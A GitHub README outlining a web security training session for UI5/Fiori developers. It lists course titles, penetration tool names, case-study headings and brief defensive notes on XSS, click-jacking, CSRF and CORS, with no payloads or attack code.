Skip to content

Latest commit

 

History

History
195 lines (138 loc) · 8.02 KB

README.md

File metadata and controls

195 lines (138 loc) · 8.02 KB

The Hitchhiker's Guide to Web Security

{:.no_toc}

Table of Content

{:.no_toc}

  • A markdown unordered list which will be replaced with the ToC, excluding the "Contents header" from above {:toc}

Objective

To understand the most common threats to web application security and what you can do to reduce the risk of your site being hacked.

Recent news

Questions for the audiences

  • Anyone who majored in the Information Security when at school?
  • Anyone who have exploited XSS vulnerability?
  • Anyone who have installed Kali Linux?
  • Anyone who have rooted your Android devices, break-jailed your iOS devices?
  • Is there any chances that you can get back your Windows log-in password if you forget them?
  • Any experiences of dealing with security issues/incidents?

Case Study

  • Exploit XSS vulnerability to steal cookies
  • Solution proposal for authorization check in anonymous applications
  • Upload limitation in anonymous applications
  • Sanitizing/Removing the <script> tag: https://sapjira.wdf.sap.corp/browse/KNGMHM02-11871
  • Security Vulnerability auditing reports by third-party auditor

Lynda - Security Training and Tutorials

More than 180 courses

Programming Foudations: Web Security

CompTIA Security+ (SY0-501) Cert Prep: 1 Threats, Attacks, and Vulnerabilities

Ethical Hacking: Website and Web Application Testing (Malcolm Shore)

Overview of web security, including Web Socket protocal

Penetration Testing Essential Training (Malcolm Shore)

What is Pen test, basic bash scripting, Python, Kali ...

Node.js: Security

React: Securing Applications

Ethical Hacking with JavaScript

DevSecOps: Automated Security Testing

Security Tips Weekly

  • Watch this course
  • Use a password manager
    • Stores a passwords for a different sites
    • Fills in passwords on websites
    • Store secure notes
    • Generate strong passwords, etc.
    • Secure all passwords with one master password
    • LastPass, KeePass, 1Password, etc.
    • Most can sync passwords between computers (browser extensions) and devices (android/ios app)

Web Security Guideline

Vulnerability Testing Lab

Penetration Tools

  • Nmap, Netcat, tcpdump, netstat ...
  • Kali Linux
  • Vega Scanner
  • Burp Suite
  • ZAP
  • ...

Certifications on Security / Cybersecurity

UI5 / Fiori Frontend Security

Cross-Site-Scripting (XSS)

XSS - Information

  • How XSS works? As a result, XSS can hijack the session id
    • DOM-based XSS: no server involved
    • Manipulated Network request: client -> server -> client
    • URL params / input
  • Solution
    • Output encoding as string, rather than JavaScript code
    • Input Validation
    • Secure Libraries

XSS - UI5 Control Protection

Click-Jacking

URL Handling

MIME-Type Sniffing

Client Storage

Cross-Site-Request-Forgery (CSRF)

Cross-Origin-Request-Sharing (CORS)

References

Books or Web Pages

SAP Related